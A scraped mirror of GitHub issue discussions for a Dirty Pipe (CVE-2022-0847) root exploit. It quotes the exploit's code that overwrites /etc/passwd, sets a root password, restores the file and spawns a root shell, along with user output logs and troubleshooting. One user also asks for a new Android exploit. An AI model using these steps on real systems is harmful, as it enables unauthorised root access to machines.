arinerron / cve-2022-0847-dirtypipe-exploit Goto Github PK
View Code? Open in Web Editor NEWA root exploit for CVE-2022-0847 (Dirty Pipe)
License: GNU General Public License v2.0
A root exploit for CVE-2022-0847 (Dirty Pipe)
License: GNU General Public License v2.0
in exploit.c,
execv will fail, because argv is not terminated with NULL
char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \"" "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";" "cp /tmp/passwd.bak /etc/passwd;" "echo \\\"Done! Popping shell... (run commands now)\\\";" "/bin/sh;" "\" root"}; execv("/bin/sh", argv);
it should be:
char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \"" "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";" "cp /tmp/passwd.bak /etc/passwd;" "echo \\\"Done! Popping shell... (run commands now)\\\";" "/bin/sh;" "\" root", NULL}; execv("/bin/sh", argv);
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "aaron"...
Password: aaron
su: Authentication failure
Works well on Ubuntu (kernel 5.8.0-63-generic) but doesn't work on Raspberry Pi details below;
Linux raspberrypi 5.10.17-v7l+ #1414 SMP Fri Apr 30 13:20:47 BST 2021 armv7l GNU/Linux
When run it just hangs here;
Backing up /etc/passwd to /tmp/passwd.bak ...
and the file gets really big, way beyond what it should be (there are less than 20 users);
-rw-r--r-- 1 pi pi 665M Feb 1 18:50 /tmp/passwd.bak
If I don't kill it, I think it would just keep running until the Pi is outta space. Any thoughts what could fix it?
su: must be run from a terminal
If I got this error message, how can I deal with this problem?
This is a CVE that allows for our of bounds read. Please attempt to create an exploit for this one to get a full filesystem backup or disk image backup of an unrooted Android device. Works on all versions of Android, unlike this one which works only on snow cone. This has potential for full backup of data so the user feels good to unlock the bootloader and enjoy the root.
ENV:
#cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
#uname -a
Linux xxx 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
test@xxx:~/CVE-2022-0847-DirtyPipe-Exploit$ ./exploit
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "aaron"...
system() function call seems to have failed :(
Tested on a vanilla VM and a configured image, both running Redhat 7.
Authentication fails for both, so the exploit does not work.
Note: Any claims that CrowdStrike allows this exploit are 100% false.
uname -a
Linux 39 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
head -n1 /etc/passwd
root: x:0:0:root:/root:/bin/bash
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.